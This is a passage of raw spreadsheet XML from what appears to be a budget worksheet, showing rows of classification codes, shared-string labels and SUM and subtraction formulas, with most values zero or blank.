        <v>3930</v>
      </c>
      <c r="F1205" s="14">
        <f t="shared" si="554"/>
        <v>1024</v>
      </c>
      <c r="G1205" s="12">
        <f t="shared" ref="G1205:R1205" si="568">SUM(G1206:G1208)</f>
        <v>123</v>
      </c>
      <c r="H1205" s="12">
        <f t="shared" si="568"/>
        <v>244</v>
      </c>
      <c r="I1205" s="12">
        <f t="shared" si="568"/>
        <v>104</v>
      </c>
      <c r="J1205" s="12">
        <f t="shared" si="568"/>
        <v>133</v>
      </c>
      <c r="K1205" s="12">
        <f t="shared" si="568"/>
        <v>139</v>
      </c>
      <c r="L1205" s="12">
        <f t="shared" si="568"/>
        <v>132</v>
      </c>
      <c r="M1205" s="12">
        <f t="shared" si="568"/>
        <v>89</v>
      </c>
      <c r="N1205" s="12">
        <f t="shared" si="568"/>
        <v>87</v>
      </c>
      <c r="O1205" s="12">
        <f t="shared" si="568"/>
        <v>69</v>
      </c>
      <c r="P1205" s="12">
        <f t="shared" si="568"/>
        <v>62</v>
      </c>
      <c r="Q1205" s="12">
        <f t="shared" si="568"/>
        <v>143</v>
      </c>
      <c r="R1205" s="12">
        <f t="shared" si="568"/>
        <v>66</v>
      </c>
      <c r="S1205" s="12">
        <v>112</v>
      </c>
      <c r="T1205" s="12">
        <v>221</v>
      </c>
      <c r="U1205" s="12">
        <v>103</v>
      </c>
      <c r="V1205" s="12">
        <v>122</v>
      </c>
      <c r="W1205" s="12">
        <v>127</v>
      </c>
      <c r="X1205" s="12">
        <v>121</v>
      </c>
      <c r="Y1205" s="12">
        <v>81</v>
      </c>
      <c r="Z1205" s="12">
        <v>79</v>
      </c>
      <c r="AA1205" s="12">
        <v>69</v>
      </c>
      <c r="AB1205" s="12">
        <v>56</v>
      </c>
      <c r="AC1205" s="12">
        <v>132</v>
      </c>
      <c r="AD1205" s="12">
        <v>60</v>
      </c>
      <c r="AE1205" s="12">
        <f t="shared" ref="AE1205:AP1205" si="569">SUM(AE1206:AE1208)</f>
        <v>11</v>
      </c>
      <c r="AF1205" s="12">
        <f t="shared" si="569"/>
        <v>23</v>
      </c>
      <c r="AG1205" s="12">
        <f t="shared" si="569"/>
        <v>1</v>
      </c>
      <c r="AH1205" s="12">
        <f t="shared" si="569"/>
        <v>11</v>
      </c>
      <c r="AI1205" s="12">
        <f t="shared" si="569"/>
        <v>12</v>
      </c>
      <c r="AJ1205" s="12">
        <f t="shared" si="569"/>
        <v>11</v>
      </c>
      <c r="AK1205" s="12">
        <f t="shared" si="569"/>
        <v>8</v>
      </c>
      <c r="AL1205" s="12">
        <f t="shared" si="569"/>
        <v>8</v>
      </c>
      <c r="AM1205" s="12">
        <f t="shared" si="569"/>
        <v>0</v>
      </c>
      <c r="AN1205" s="12">
        <f t="shared" si="569"/>
        <v>6</v>
      </c>
      <c r="AO1205" s="12">
        <f t="shared" si="569"/>
        <v>11</v>
      </c>
      <c r="AP1205" s="12">
        <f t="shared" si="569"/>
        <v>6</v>
      </c>
    </row>
    <row r="1206" ht="18" customHeight="1" spans="1:42">
      <c r="A1206" s="10"/>
      <c r="B1206" s="10"/>
      <c r="C1206" s="28"/>
      <c r="D1206" s="10">
        <v>2210201</v>
      </c>
      <c r="E1206" s="16" t="s">
        <v>3931</v>
      </c>
      <c r="F1206" s="14">
        <f t="shared" si="554"/>
        <v>1024</v>
      </c>
      <c r="G1206" s="17">
        <v>123</v>
      </c>
      <c r="H1206" s="17">
        <v>244</v>
      </c>
      <c r="I1206" s="17">
        <v>104</v>
      </c>
      <c r="J1206" s="17">
        <v>133</v>
      </c>
      <c r="K1206" s="17">
        <v>139</v>
      </c>
      <c r="L1206" s="17">
        <v>132</v>
      </c>
      <c r="M1206" s="17">
        <v>89</v>
      </c>
      <c r="N1206" s="17">
        <v>87</v>
      </c>
      <c r="O1206" s="17">
        <v>69</v>
      </c>
      <c r="P1206" s="17">
        <v>62</v>
      </c>
      <c r="Q1206" s="17">
        <v>143</v>
      </c>
      <c r="R1206" s="17">
        <v>66</v>
      </c>
      <c r="S1206" s="17">
        <v>112</v>
      </c>
      <c r="T1206" s="17">
        <v>221</v>
      </c>
      <c r="U1206" s="17">
        <v>103</v>
      </c>
      <c r="V1206" s="17">
        <v>122</v>
      </c>
      <c r="W1206" s="17">
        <v>127</v>
      </c>
      <c r="X1206" s="17">
        <v>121</v>
      </c>
      <c r="Y1206" s="17">
        <v>81</v>
      </c>
      <c r="Z1206" s="17">
        <v>79</v>
      </c>
      <c r="AA1206" s="17">
        <v>69</v>
      </c>
      <c r="AB1206" s="17">
        <v>56</v>
      </c>
      <c r="AC1206" s="17">
        <v>132</v>
      </c>
      <c r="AD1206" s="17">
        <v>60</v>
      </c>
      <c r="AE1206" s="17">
        <f t="shared" ref="AE1206:AP1208" si="570">G1206-S1206</f>
        <v>11</v>
      </c>
      <c r="AF1206" s="17">
        <f t="shared" si="570"/>
        <v>23</v>
      </c>
      <c r="AG1206" s="17">
        <f t="shared" si="570"/>
        <v>1</v>
      </c>
      <c r="AH1206" s="17">
        <f t="shared" si="570"/>
        <v>11</v>
      </c>
      <c r="AI1206" s="17">
        <f t="shared" si="570"/>
        <v>12</v>
      </c>
      <c r="AJ1206" s="17">
        <f t="shared" si="570"/>
        <v>11</v>
      </c>
      <c r="AK1206" s="17">
        <f t="shared" si="570"/>
        <v>8</v>
      </c>
      <c r="AL1206" s="17">
        <f t="shared" si="570"/>
        <v>8</v>
      </c>
      <c r="AM1206" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AN1206" s="17">
        <f t="shared" si="570"/>
        <v>6</v>
      </c>
      <c r="AO1206" s="17">
        <f t="shared" si="570"/>
        <v>11</v>
      </c>
      <c r="AP1206" s="17">
        <f t="shared" si="570"/>
        <v>6</v>
      </c>
    </row>
    <row r="1207" ht="18" customHeight="1" spans="1:42">
      <c r="A1207" s="10"/>
      <c r="B1207" s="10"/>
      <c r="C1207" s="28"/>
      <c r="D1207" s="10">
        <v>2210202</v>
      </c>
      <c r="E1207" s="16" t="s">
        <v>3932</v>
      </c>
      <c r="F1207" s="14">
        <f t="shared" si="554"/>
        <v>0</v>
      </c>
      <c r="G1207" s="17"/>
      <c r="H1207" s="17"/>
      <c r="I1207" s="17"/>
      <c r="J1207" s="17"/>
      <c r="K1207" s="17"/>
      <c r="L1207" s="17"/>
      <c r="M1207" s="17"/>
      <c r="N1207" s="17"/>
      <c r="O1207" s="17"/>
      <c r="P1207" s="17"/>
      <c r="Q1207" s="17"/>
      <c r="R1207" s="17"/>
      <c r="S1207" s="17"/>
      <c r="T1207" s="17"/>
      <c r="U1207" s="17"/>
      <c r="V1207" s="17"/>
      <c r="W1207" s="17"/>
      <c r="X1207" s="17"/>
      <c r="Y1207" s="17"/>
      <c r="Z1207" s="17"/>
      <c r="AA1207" s="17"/>
      <c r="AB1207" s="17"/>
      <c r="AC1207" s="17"/>
      <c r="AD1207" s="17"/>
      <c r="AE1207" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AF1207" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AG1207" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AH1207" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AI1207" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AJ1207" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AK1207" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AL1207" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AM1207" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AN1207" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AO1207" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AP1207" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
    </row>
    <row r="1208" ht="18" customHeight="1" spans="1:42">
      <c r="A1208" s="10"/>
      <c r="B1208" s="10"/>
      <c r="C1208" s="28"/>
      <c r="D1208" s="10">
        <v>2210203</v>
      </c>
      <c r="E1208" s="16" t="s">
        <v>3933</v>
      </c>
      <c r="F1208" s="14">
        <f t="shared" si="554"/>
        <v>0</v>
      </c>
      <c r="G1208" s="17"/>
      <c r="H1208" s="17"/>
      <c r="I1208" s="17"/>
      <c r="J1208" s="17"/>
      <c r="K1208" s="17"/>
      <c r="L1208" s="17"/>
      <c r="M1208" s="17"/>
      <c r="N1208" s="17"/>
      <c r="O1208" s="17"/>
      <c r="P1208" s="17"/>
      <c r="Q1208" s="17"/>
      <c r="R1208" s="17"/>
      <c r="S1208" s="17"/>
      <c r="T1208" s="17"/>
      <c r="U1208" s="17"/>
      <c r="V1208" s="17"/>
      <c r="W1208" s="17"/>
      <c r="X1208" s="17"/>
      <c r="Y1208" s="17"/>
      <c r="Z1208" s="17"/>
      <c r="AA1208" s="17"/>
      <c r="AB1208" s="17"/>
      <c r="AC1208" s="17"/>
      <c r="AD1208" s="17"/>
      <c r="AE1208" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AF1208" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AG1208" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AH1208" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AI1208" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AJ1208" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AK1208" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AL1208" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AM1208" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AN1208" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AO1208" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
      <c r="AP1208" s="17">
        <f t="shared" si="570"/>
        <v>0</v>
      </c>
    </row>
    <row r="1209" ht="18" customHeight="1" spans="1:42">
      <c r="A1209" s="10"/>
      <c r="B1209" s="10"/>
      <c r="C1209" s="28"/>
      <c r="D1209" s="10">
        <v>22103</v>
      </c>
      <c r="E1209" s="11" t="s">
        <v>3934</v>
      </c>
      <c r="F1209" s="14">
        <f t="shared" si="554"/>
        <v>0</v>
      </c>
      <c r="G1209" s="12">
        <f t="shared" ref="G1209:R1209" si="571">SUM(G1210:G1212)</f>
        <v>0</v>
      </c>
      <c r="H1209" s="12">
        <f t="shared" si="571"/>
        <v>0</v>
      </c>
      <c r="I1209" s="12">
        <f t="shared" si="571"/>
        <v>0</v>
      </c>
      <c r="J1209" s="12">
        <f t="shared" si="571"/>
        <v>0</v>
      </c>
      <c r="K1209" s="12">
        <f t="shared" si="571"/>
        <v>0</v>
      </c>
      <c r="L1209" s="12">
        <f t="shared" si="571"/>
        <v>0</v>
      </c>
      <c r="M1209" s="12">
        <f t="shared" si="571"/>
        <v>0</v>
      </c>
      <c r="N1209" s="12">
        <f t="shared" si="571"/>
        <v>0</v>
      </c>
      <c r="O1209" s="12">
        <f t="shared" si="571"/>
        <v>0</v>
      </c>
      <c r="P1209" s="12">
        <f t="shared" si="571"/>
        <v>0</v>
      </c>
      <c r="Q1209" s="12">
        <f t="shared" si="571"/>
        <v>0</v>
      </c>
      <c r="R1209" s="12">
        <f t="shared" si="571"/>
        <v>0</v>
      </c>
      <c r="S1209" s="12">
        <v>0</v>
      </c>
      <c r="T1209" s="12">
        <v>0</v>
      </c>
      <c r="U1209" s="12">
        <v>0</v>
      </c>
      <c r="V1209" s="12">
        <v>0</v>
      </c>
      <c r="W1209" s="12">
        <v>0</v>
      </c>
      <c r="X1209" s="12">
        <v>0</v>
      </c>
      <c r="Y1209" s="12">
        <v>0</v>
      </c>
      <c r="Z1209" s="12">
        <v>0</v>
      </c>
      <c r="AA1209" s="12">
        <v>0</v>
      </c>
      <c r="AB1209" s="12">
        <v>0</v>
      </c>
      <c r="AC1209" s="12">
        <v>0</v>
      </c>
      <c r="AD1209" s="12">
        <v>0</v>
      </c>
      <c r="AE1209" s="12">
        <f t="shared" ref="AE1209:AP1209" si="572">SUM(AE1210:AE1212)</f>
        <v>0</v>
      </c>
      <c r="AF1209" s="12">
        <f t="shared" si="572"/>
        <v>0</v>
      </c>
      <c r="AG1209" s="12">
        <f t="shared" si="572"/>
        <v>0</v>
      </c>
      <c r="AH1209" s="12">
        <f t="shared" si="572"/>
        <v>0</v>
      </c>
      <c r="AI1209" s="12">
        <f t="shared" si="572"/>
        <v>0</v>
      </c>
      <c r="AJ1209" s="12">
        <f t="shared" si="572"/>
        <v>0</v>
      </c>
      <c r="AK1209" s="12">
        <f t="shared" si="572"/>
        <v>0</v>
      </c>
      <c r="AL1209" s="12">
        <f t="shared" si="572"/>
        <v>0</v>
      </c>
      <c r="AM1209" s="12">
        <f t="shared" si="572"/>
        <v>0</v>
      </c>
      <c r="AN1209" s="12">
        <f t="shared" si="572"/>
        <v>0</v>
      </c>
      <c r="AO1209" s="12">
        <f t="shared" si="572"/>
        <v>0</v>
      </c>
      <c r="AP1209" s="12">
        <f t="shared" si="572"/>
        <v>0</v>
      </c>
    </row>
    <row r="1210" ht="18" customHeight="1" spans="1:42">
      <c r="A1210" s="10"/>
      <c r="B1210" s="10"/>
      <c r="C1210" s="28"/>
      <c r="D1210" s="10">
        <v>2210301</v>
      </c>
      <c r="E1210" s="16" t="s">
        <v>3935</v>
      </c>
      <c r="F1210" s="14">
        <f t="shared" si="554"/>
        <v>0</v>
      </c>
      <c r="G1210" s="17"/>
      <c r="H1210" s="17"/>
      <c r="I1210" s="17"/>
      <c r="J1210" s="17"/>
      <c r="K1210" s="17"/>
      <c r="L1210" s="17"/>
      <c r="M1210" s="17"/>
      <c r="N1210" s="17"/>
      <c r="O1210" s="17"/>
      <c r="P1210" s="17"/>
      <c r="Q1210" s="17"/>
      <c r="R1210" s="17"/>
      <c r="S1210" s="17"/>
      <c r="T1210" s="17"/>
      <c r="U1210" s="17"/>
      <c r="V1210" s="17"/>
      <c r="W1210" s="17"/>
      <c r="X1210" s="17"/>
      <c r="Y1210" s="17"/>
      <c r="Z1210" s="17"/>
      <c r="AA1210" s="17"/>
      <c r="AB1210" s="17"/>
      <c r="AC1210" s="17"/>
      <c r="AD1210" s="17"/>
      <c r="AE1210" s="17">
        <f t="shared" ref="AE1210:AP1212" si="573">G1210-S1210</f>
        <v>0</v>
      </c>
      <c r="AF1210" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AG1210" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AH1210" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AI1210" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AJ1210" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AK1210" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AL1210" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AM1210" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AN1210" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AO1210" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AP1210" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
    </row>
    <row r="1211" ht="18" customHeight="1" spans="1:42">
      <c r="A1211" s="10"/>
      <c r="B1211" s="10"/>
      <c r="C1211" s="28"/>
      <c r="D1211" s="10">
        <v>2210302</v>
      </c>
      <c r="E1211" s="16" t="s">
        <v>3936</v>
      </c>
      <c r="F1211" s="14">
        <f t="shared" si="554"/>
        <v>0</v>
      </c>
      <c r="G1211" s="17"/>
      <c r="H1211" s="17"/>
      <c r="I1211" s="17"/>
      <c r="J1211" s="17"/>
      <c r="K1211" s="17"/>
      <c r="L1211" s="17"/>
      <c r="M1211" s="17"/>
      <c r="N1211" s="17"/>
      <c r="O1211" s="17"/>
      <c r="P1211" s="17"/>
      <c r="Q1211" s="17"/>
      <c r="R1211" s="17"/>
      <c r="S1211" s="17"/>
      <c r="T1211" s="17"/>
      <c r="U1211" s="17"/>
      <c r="V1211" s="17"/>
      <c r="W1211" s="17"/>
      <c r="X1211" s="17"/>
      <c r="Y1211" s="17"/>
      <c r="Z1211" s="17"/>
      <c r="AA1211" s="17"/>
      <c r="AB1211" s="17"/>
      <c r="AC1211" s="17"/>
      <c r="AD1211" s="17"/>
      <c r="AE1211" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AF1211" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AG1211" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AH1211" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AI1211" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AJ1211" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AK1211" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AL1211" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AM1211" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AN1211" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AO1211" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AP1211" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
    </row>
    <row r="1212" ht="18" customHeight="1" spans="1:42">
      <c r="A1212" s="10"/>
      <c r="B1212" s="10"/>
      <c r="C1212" s="28"/>
      <c r="D1212" s="10">
        <v>2210399</v>
      </c>
      <c r="E1212" s="16" t="s">
        <v>3937</v>
      </c>
      <c r="F1212" s="14">
        <f t="shared" si="554"/>
        <v>0</v>
      </c>
      <c r="G1212" s="17"/>
      <c r="H1212" s="17"/>
      <c r="I1212" s="17"/>
      <c r="J1212" s="17"/>
      <c r="K1212" s="17"/>
      <c r="L1212" s="17"/>
      <c r="M1212" s="17"/>
      <c r="N1212" s="17"/>
      <c r="O1212" s="17"/>
      <c r="P1212" s="17"/>
      <c r="Q1212" s="17"/>
      <c r="R1212" s="17"/>
      <c r="S1212" s="17"/>
      <c r="T1212" s="17"/>
      <c r="U1212" s="17"/>
      <c r="V1212" s="17"/>
      <c r="W1212" s="17"/>
      <c r="X1212" s="17"/>
      <c r="Y1212" s="17"/>
      <c r="Z1212" s="17"/>
      <c r="AA1212" s="17"/>
      <c r="AB1212" s="17"/>
      <c r="AC1212" s="17"/>
      <c r="AD1212" s="17"/>
      <c r="AE1212" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AF1212" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AG1212" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AH1212" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AI1212" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AJ1212" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AK1212" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AL1212" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AM1212" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AN1212" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AO1212" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
      <c r="AP1212" s="17">
        <f t="shared" si="573"/>
        <v>0</v>
      </c>
    </row>
    <row r="1213" ht="18" customHeight="1" spans="1:42">
      <c r="A1213" s="10"/>
      <c r="B1213" s="10"/>
      <c r="C1213" s="28"/>
      <c r="D1213" s="10">
        <v>222</v>
      </c>
      <c r="E1213" s="11" t="s">
        <v>3938</v>
      </c>
      <c r="F1213" s="14">
        <f t="shared" si="554"/>
        <v>0</v>
      </c>
      <c r="G1213" s="12">
        <f t="shared" ref="G1213:R1213" si="574">G1214+G1232+G1238+G1244</f>
        <v>0</v>
      </c>
      <c r="H1213" s="12">
        <f t="shared" si="574"/>
        <v>0</v>
      </c>
      <c r="I1213" s="12">
        <f t="shared" si="574"/>
        <v>0</v>
      </c>
      <c r="J1213" s="12">
        <f t="shared" si="574"/>
        <v>0</v>
      </c>
      <c r="K1213" s="12">
        <f t="shared" si="574"/>
        <v>0</v>
      </c>
      <c r="L1213" s="12">
        <f t="shared" si="574"/>
        <v>0</v>
      </c>
      <c r="M1213" s="12">
        <f t="shared" si="574"/>
        <v>0</v>
      </c>
      <c r="N1213" s="12">
        <f t="shared" si="574"/>
        <v>0</v>
      </c>
      <c r="O1213" s="12">
        <f t="shared" si="574"/>
        <v>0</v>
      </c>
      <c r="P1213" s="12">
        <f t="shared" si="574"/>
        <v>0</v>
      </c>
      <c r="Q1213" s="12">
        <f t="shared" si="574"/>
        <v>0</v>
      </c>
      <c r="R1213" s="12">
        <f t="shared" si="574"/>
        <v>0</v>
      </c>
      <c r="S1213" s="12">
        <v>0</v>
      </c>
      <c r="T1213" s="12">
        <v>0</v>
      </c>
      <c r="U1213" s="12">
        <v>0</v>
      </c>
      <c r="V1213" s="12">
        <v>0</v>
      </c>
      <c r="W1213" s="12">
        <v>0</v>
      </c>
      <c r="X1213" s="12">
        <v>0</v>
      </c>
      <c r="Y1213" s="12">
        <v>0</v>
      </c>
      <c r="Z1213" s="12">
        <v>0</v>
      </c>
      <c r="AA1213" s="12">
        <v>0</v>
      </c>
      <c r="AB1213" s="12">
        <v>0</v>
      </c>
      <c r="AC1213" s="12">
        <v>0</v>
      </c>
      <c r="AD1213" s="12">
        <v>0</v>
      </c>
      <c r="AE1213" s="12">
        <f t="shared" ref="AE1213:AP1213" si="575">AE1214+AE1232+AE1238+AE1244</f>
        <v>0</v>
      </c>
      <c r="AF1213" s="12">
        <f t="shared" si="575"/>
        <v>0</v>
      </c>
      <c r="AG1213" s="12">
        <f t="shared" si="575"/>
        <v>0</v>
      </c>
      <c r="AH1213" s="12">
        <f t="shared" si="575"/>
        <v>0</v>
      </c>
      <c r="AI1213" s="12">
        <f t="shared" si="575"/>
        <v>0</v>
      </c>
      <c r="AJ1213" s="12">
        <f t="shared" si="575"/>
        <v>0</v>
      </c>
      <c r="AK1213" s="12">
        <f t="shared" si="575"/>
        <v>0</v>
      </c>
      <c r="AL1213" s="12">
        <f t="shared" si="575"/>
        <v>0</v>
      </c>
      <c r="AM1213" s="12">
        <f t="shared" si="575"/>
        <v>0</v>
      </c>
      <c r="AN1213" s="12">
        <f t="shared" si="575"/>
        <v>0</v>
      </c>
      <c r="AO1213" s="12">
        <f t="shared" si="575"/>
        <v>0</v>
      </c>
      <c r="AP1213" s="12">
        <f t="shared" si="575"/>
        <v>0</v>
      </c>
    </row>
    <row r="1214" ht="18" customHeight="1" spans="1:42">
      <c r="A1214" s="10"/>
      <c r="B1214" s="10"/>
      <c r="C1214" s="28"/>
      <c r="D1214" s="10">
        <v>22201</v>
      </c>
      <c r="E1214" s="11" t="s">
        <v>3939</v>
      </c>
      <c r="F1214" s="14">
        <f t="shared" si="554"/>
        <v>0</v>
      </c>
      <c r="G1214" s="12">
        <f t="shared" ref="G1214:R1214" si="576">SUM(G1215:G1231)</f>
        <v>0</v>
      </c>
      <c r="H1214" s="12">
        <f t="shared" si="576"/>
        <v>0</v>
      </c>
      <c r="I1214" s="12">
        <f t="shared" si="576"/>
        <v>0</v>
      </c>
      <c r="J1214" s="12">
        <f t="shared" si="576"/>
        <v>0</v>
      </c>
      <c r="K1214" s="12">
        <f t="shared" si="576"/>
        <v>0</v>
      </c>
      <c r="L1214" s="12">
        <f t="shared" si="576"/>
        <v>0</v>
      </c>
      <c r="M1214" s="12">
        <f t="shared" si="576"/>
        <v>0</v>
      </c>
      <c r="N1214" s="12">
        <f t="shared" si="576"/>
        <v>0</v>
      </c>
      <c r="O1214" s="12">
        <f t="shared" si="576"/>
        <v>0</v>
      </c>
      <c r="P1214" s="12">
        <f t="shared" si="576"/>
        <v>0</v>
      </c>
      <c r="Q1214" s="12">
        <f t="shared" si="576"/>
        <v>0</v>
      </c>
      <c r="R1214" s="12">
        <f t="shared" si="576"/>
        <v>0</v>
      </c>
      <c r="S1214" s="12">
        <v>0</v>
      </c>
      <c r="T1214" s="12">
        <v>0</v>
      </c>
      <c r="U1214" s="12">
        <v>0</v>
      </c>
      <c r="V1214" s="12">
        <v>0</v>
      </c>
      <c r="W1214" s="12">
        <v>0</v>
      </c>
      <c r="X1214" s="12">
        <v>0</v>
      </c>
      <c r="Y1214" s="12">
        <v>0</v>
      </c>
      <c r="Z1214" s="12">
        <v>0</v>
      </c>
      <c r="AA1214" s="12">
        <v>0</v>
      </c>
      <c r="AB1214" s="12">
        <v>0</v>
      </c>
      <c r="AC1214" s="12">
        <v>0</v>
      </c>
      <c r="AD1214" s="12">
        <v>0</v>
      </c>
      <c r="AE1214" s="12">
        <f t="shared" ref="AE1214:AP1214" si="577">SUM(AE1215:AE1231)</f>
        <v>0</v>
      </c>
      <c r="AF1214" s="12">
        <f t="shared" si="577"/>
        <v>0</v>
      </c>
      <c r="AG1214" s="12">
        <f t="shared" si="577"/>
        <v>0</v>
      </c>
      <c r="AH1214" s="12">
        <f t="shared" si="577"/>
        <v>0</v>
      </c>
      <c r="AI1214" s="12">
        <f t="shared" si="577"/>
        <v>0</v>
      </c>
      <c r="AJ1214" s="12">
        <f t="shared" si="577"/>
        <v>0</v>
      </c>
      <c r="AK1214" s="12">
        <f t="shared" si="577"/>
        <v>0</v>
      </c>
      <c r="AL1214" s="12">
        <f t="shared" si="577"/>
        <v>0</v>
      </c>
      <c r="AM1214" s="12">
        <f t="shared" si="577"/>
        <v>0</v>
      </c>
      <c r="AN1214" s="12">
        <f t="shared" si="577"/>
        <v>0</v>
      </c>
      <c r="AO1214" s="12">
        <f t="shared" si="577"/>
        <v>0</v>
      </c>
      <c r="AP1214" s="12">
        <f t="shared" si="577"/>
        <v>0</v>
      </c>
    </row>
    <row r="1215" ht="18" customHeight="1" spans="1:42">
      <c r="A1215" s="10"/>
      <c r="B1215" s="10"/>
      <c r="C1215" s="28"/>
      <c r="D1215" s="10">
        <v>2220101</v>
      </c>
      <c r="E1215" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1215" s="14">
        <f t="shared" si="554"/>
        <v>0</v>
      </c>
      <c r="G1215" s="17"/>
      <c r="H1215" s="17"/>
      <c r="I1215" s="17"/>
      <c r="J1215" s="17"/>
      <c r="K1215" s="17"/>
      <c r="L1215" s="17"/>
      <c r="M1215" s="17"/>
      <c r="N1215" s="17"/>
      <c r="O1215" s="17"/>
      <c r="P1215" s="17"/>
      <c r="Q1215" s="17"/>
      <c r="R1215" s="17"/>
      <c r="S1215" s="17"/>
      <c r="T1215" s="17"/>
      <c r="U1215" s="17"/>
      <c r="V1215" s="17"/>
      <c r="W1215" s="17"/>
      <c r="X1215" s="17"/>
      <c r="Y1215" s="17"/>
      <c r="Z1215" s="17"/>
      <c r="AA1215" s="17"/>
      <c r="AB1215" s="17"/>
      <c r="AC1215" s="17"/>
      <c r="AD1215" s="17"/>
      <c r="AE1215" s="17">
        <f t="shared" ref="AE1215:AP1231" si="578">G1215-S1215</f>
        <v>0</v>
      </c>
      <c r="AF1215" s="17">
        <f t="shared" si="578"/>
        <v>0</v>
      </c>
      <c r="AG1215" s="17">
        <f t="shared" si="578"/>
        <v>0</v>
      </c>
      <c r="AH1215" s="17">
        <f t="shared" si="578"/>
        <v>0</v>
      </c>
      <c r="AI1215" s="17">
        <f t="shared" si="578"/>
        <v>0</v>
      </c>
      <c r="AJ1215" s="17">
        <f t="shared" si="578"/>
        <v>0</v>
      </c>
      <c r="AK1215" s="17">
        <f t="shared" si="578"/>
        <v>0</v>
      </c>
      <c r="AL1215" s="17">
        <f t="shared" si="578"/>
        <v>0</v>
      </c>
      <c r="AM1215" s="17">
        <f t="shared" si="578"/>
        <v>0</v>
      </c>
      <c r="AN1215" s="17">
        <f t="shared" si="578"/>
        <v>0</v>
      </c>
      <c r="AO1215" s="17">
        <f t="shared" si="578"/>
        <v>0</v>
      </c>
      <c r="AP1215" s="17">
        <f t="shared" si="578"/>
        <v>0</v>
      </c>
    </row>
    <row r="1216" ht="18" customHeight="1" spans="1:42">
      <c r="A1216" s="10"/>
      <c r="B1216" s="10"/>
      <c r="C1216" s="28"/>
      <c r="D1216" s="10">
        <v>2220102</v>
      </c>
      <c r="E1216" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1216" s="14">
        <f t="shared" si="554"/>
        <v>0</v>
      </c>
      <c r="G1216" s="17"/>
      <c r="H1216" s="17"/>
      <c r="I1216" s="17"/>
      <c r="J1216" s="17"/>
      <c r="K1216" s="17"/>
      <c r="L1216" s="17"/>
      <c r="M1216" s="17"/>
      <c r="N1216" s="17"/>
      <c r="O1216" s="17"/>
      <c r="P1216" s="17"/>
      <c r="Q1216" s="17"/>
      <c r="R1216" s="17"/>
      <c r="S1216" s="17"/>
      <c r="T1216" s="17"/>
      <c r="U1216" s="17"/>
      <c r="V1216" s="17"/>
      <c r="W1216" s="17"/>
      <c r="X1216" s="17"/>
      <c r="Y1216" s="17"/>
      <c r="Z1216" s="17"/>
